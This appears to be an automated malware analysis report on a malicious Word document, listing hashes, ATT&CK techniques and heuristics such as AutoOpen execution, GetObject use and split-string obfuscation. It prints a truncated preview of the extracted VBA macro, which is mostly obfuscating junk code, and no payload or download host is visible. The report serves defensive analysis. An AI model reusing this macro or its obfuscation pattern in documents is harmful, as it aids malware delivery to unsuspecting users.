Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bdd6d13b63f789e…

MALICIOUS

Office (OLE)

158.8 KB Created: 2019-04-17 07:57:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 221a7a4b6a75abbeda07285c004c6732 SHA-1: ae6d841848c43418ad0946e344df53f175ee6587 SHA-256: 6bdd6d13b63f789ed0c37bca07e57e603c35169c1bf325860b85f4f1ec192d52
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro with an autoopen subroutine, indicating it is designed to execute automatically upon opening. Critical heuristics indicate obfuscation techniques and the use of the GetObject API to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process' which is a strong indicator of malicious intent.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6944243-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6944243-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28486 bytes
SHA-256: 37fda5a1f2aa7dc3747c915c70c644946ba37275032accf9dc8b51d3128511af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kDAQAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jAAwCAA"
Attribute VB_Base = "0{F1DEB5AA-AA7A-4F5D-B93D-2FD8EF38F997}{E431C063-FB9F-4623-8290-C3369EDB84FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "oDXABDDo"
Attribute VB_Base = "0{C870EB7E-95B3-45A3-A9C4-E9FAE6C4621D}{9F4924FF-48FB-438B-AE43-90F0ACF72393}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "q1AC_X"
Sub autoopen()
   If nxGkAcC = dkAADQU Then
    jADx1A4 = 253082994 * foAQA4wQ
  ElseIf u4QCoGA = NAXCxZ Then
    Set mUZQAk = hABD_o
  ElseIf D4kwAAAc = foAAAA Then
   YAAxA_U = tB1QDA / VUAABDZB * NGUAQAA + Sqr(iAoAAB)
  ElseIf VGAwckAA = tAUA_4C Then
   bAAxBC = 712427310
End If
   If NDAAAU = Wxxk_A Then
    MADAAQc = 821092024 * rXQ4AxZ
  ElseIf oADcccA = rQUXXABw Then
    Set JAkAxABQ = KcA_DXAA
  ElseIf DUX1cA = AoA4o4Q Then
   mAAUA4Z = vCBcAUCA / cA_oACQ * fkxUQQBk + Sqr(hkUBAwXQ)
  ElseIf hAAAAAB = j_AQUo Then
   M1AA1CDA = 360151527
End If
   If sco1ZG = oAoBAoA Then
    KAABUDx = 700594498 * sAAk1XA
  ElseIf EwGAQxAA = XkAkBD Then
    Set K_Ao4A = HAkBDZ
  ElseIf NwZ1AABA = jACwXAD Then
   ECwAAUZo = zUCAxoA / QUoZUCAo * cDZ1QwcA + Sqr(u1CZCZ)
  ElseIf aADBokQA = qGAQUCQ Then
   VXBxAA4 = 53062229
End If
jADDA1DA
   If zAAABU = qAwD_1A1 Then
    CAx1Qw = 125446710 * zZAAZw4
  ElseIf EcXXBwBA = HAAUAAA Then
    Set jAQCkQ = iUAooB
  ElseIf wcowQ_ = i1XBAAAw Then
   mCBADUG = BQGABc / wD41wxBD * fQUoZ_D + Sqr(joA_BB1)
  ElseIf vA4411oB = bCUUAA Then
   pA1wo__ = 894511143
End If
   If uZAAAx_X = cXB1AZwG Then
    Io4ADDC = 399256549 * jUAXAkG
  ElseIf TA_BAwUc = P_AACBxA Then
    Set vDDGoA = TAAAZUXU
  ElseIf XQcUAB = NZZ4xwQG Then
   wQCkDA = k_cUUQ / XUDQAQ_C * MQwAABA + Sqr(wAAAAA4)
  ElseIf wQACAxQD = uA1c1_A Then
   oUkDAkCC = 111865309
End If
End Sub

Attribute VB_Name = "B_Ccc_Qc"
Function jADDA1DA()
On Error Resume Next
   If zAB4AAQ = MwBkkB Then
    uXAAAD = 866597989 * zxA4A_D
  ElseIf CCAcc1D = VCX4AUU Then
    Set CBAXUQA = D_AQwkQZ
  ElseIf vwBGBG_k = JwoBD1A Then
   NAQkZxCw = DBADA1AX / ZwUAZ4BB * vcAAAcUD + Sqr(u_BUwZo)
  ElseIf cCkCAUxU = vXDAAAD Then
   PAAABQcx = 392269431
End If
   If uBoAUoUx = wXB_1Q Then
    GUwXUAZU = 239655598 * rDZAcA
  ElseIf wAGDoABc = DUGUUAA Then
    Set XBGcA4oA = UBACcQA
  ElseIf SBQAD1 = XAcoBD Then
   N1CAAcBA = cQAU4DXw / uw1U_QA1 * rZoDU_k + Sqr(SAZA4A)
  ElseIf nBAGDD = BxABXBAA Then
   CAGcAwQA = 904319934
End If
If 9433 < 99032 Then
qUAcAB = vbFalse
   If vGo1AA4B = GQBAcDDA Then
    wZ4DBDo = 851439880 * tA1AccBA
  ElseIf DcXAGZA = X4AxBoU Then
    Set WcDA4AA1 = rxAAA_Q
  ElseIf kAADAw = GAABBA Then
   kDADAcD = oAX_ZQxA / RDoDQAA * nBADXGQ + Sqr(jAUDAw)
  ElseIf fB4AUGZ = TAcQBxXo Then
   bQcQCA = 799267966
End If
   If VCBQAAQA = oAA_BUD Then
    zAAACA = 64022806 * zAQ_4A
  ElseIf OAAQZD = H4kA_G Then
    Set SAA4ZA = z4ACA1
  ElseIf IDk1AGZ_ = pAAUUAk Then
   HZGUUA = tAA_Bo1 / bABUC_ * FBAAAU + Sqr(K4AZGA)
  ElseIf E4kwACAA = pwAAXx4 Then
   E1Ac4Z = 434060514
End If
   If V4AoB4G = KBBwwAA Then
    DQQ1GUA = 836311093 * uAC4_G
  ElseIf zAA_4Q = SAXoAx Then
    Set nAAkAABU = AwACDBA
  ElseIf bk4CAAQ = hUAoZDB Then
   jwBUUkwQ = VDA_xBAA / ZGDDCDAA * IDQ4AUoA + Sqr(lAAACAx)
  ElseIf OADUk_x = mAwZUoA Then
   BA4UAAGc = 758232136
End If
End If
   If AAAxGAwA = JXwAXA1 Then
    iAQwBxQ = 97893313 * JXQADZA
  ElseIf uAwXG4 = vADDAA Then
    Set cwUZxkQZ = WABkCU_w
  ElseIf Wc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.